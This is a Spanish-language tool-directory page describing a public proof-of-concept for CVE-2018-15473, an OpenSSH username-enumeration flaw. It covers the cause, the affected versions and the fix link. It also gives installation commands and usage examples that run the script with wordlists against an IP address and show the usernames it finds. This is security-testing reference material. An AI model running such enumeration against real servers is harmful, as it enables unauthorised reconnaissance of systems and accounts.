Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/1stpeak/cve-2018-15473
ReconocimientoAnálisis de VulnerabilidadesExplotaciónRecopilación de InformaciónSeguridad de RedesPruebas de Penetración
GitHub1stpeak/cve-2018-15473

CVE-2018-15473

Herramienta de enumeración de nombres de usuario SSH que explota CVE-2018-15473 para identificar usuarios válidos en servidores OpenSSH mediante una omisión de autenticación basada en tiempos.

Ver Repositorio
hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
CVE-2018-15473 — Herramienta de enumeración de nombres de usuario SSH que explota CVE-2018-15473 para identificar usuarios válidos en servidores OpenSSH mediante una omisión de autenticación basada en tiempos. | Kitploit

CVE-2018-15473

Causa

El servidor OpenSSH no retrasa el procesamiento de un usuario inválido antes de analizar completamente un paquete que contiene una solicitud. Esta vulnerabilidad está relacionada con auth2-gss.c, auth2-hostbased.c y auth2-pubkey.c.

Explotación

Aunque esta vulnerabilidad no puede utilizarse para generar una lista válida de nombres de usuario, aún se puede emplear para enumerar y adivinar nombres de usuario.

Versiones afectadas

OpenSSH <= 7.7

Versiones no afectadas

openssh-7.8p1-1.fc28 openssh-7.6p1-6.fc27

Instalación del PoC

Es posible que necesite instalar el paquete equivalente a openssl-dev de su distribución.

root@kitploit:~
# Nota: Si está instalando en Kali, puede omitir la instalación de pip y solo seguir los pasos 1, 2 y 3, ya que paramiko ya está presente.
git clone https://github.com/1stPeak/CVE-2018-15473.git
cd CVE-2018-15473
chmod u+x ssh-username-enum.py
pip install -r requirements.txt
# O descárguelo e instálelo con el siguiente comando
pipenv install -r requirements.txt  # si es tan moderno como eso
chmod u+x ssh-username-enum.py

Ejemplos de uso

Ejemplo 1: Enumeración de un solo usuario

root@kitploit:~
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -u root 192.168.1.2
[+] root found!

Ejemplo 2: Enumeración de múltiples usuarios con 10 hilos (por defecto 4 hilos)

root@kitploit:~
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -t 10 -w /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.2
[+] man found!
[+] guest found!
[+] nobody found!
[!] SSH negotiation failed for user nobody4.
[+] lpadmin found!
etc.

Ejemplo 3: Dirección IPv6 con puerto SSH especificado

root@kitploit:~
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -t 10 -w /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.2 '::1'
[+] ROOT found!
[+] syslog found!
[+] sslh found!
[!] SSH negotiation failed for user sssd.
[+] rfindd found!
[+] ultra found!
etc.

Solución

Se recomienda a los usuarios actualizar a una versión no afectada. El proyecto OpenBSD ha publicado una corrección de código fuente en el siguiente enlace: https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0

Referencias

https://github.com/epi052/cve-2018-15473
http://blog.nsfocus.net/openssh-cve-2018-15919/

Descargar herramienta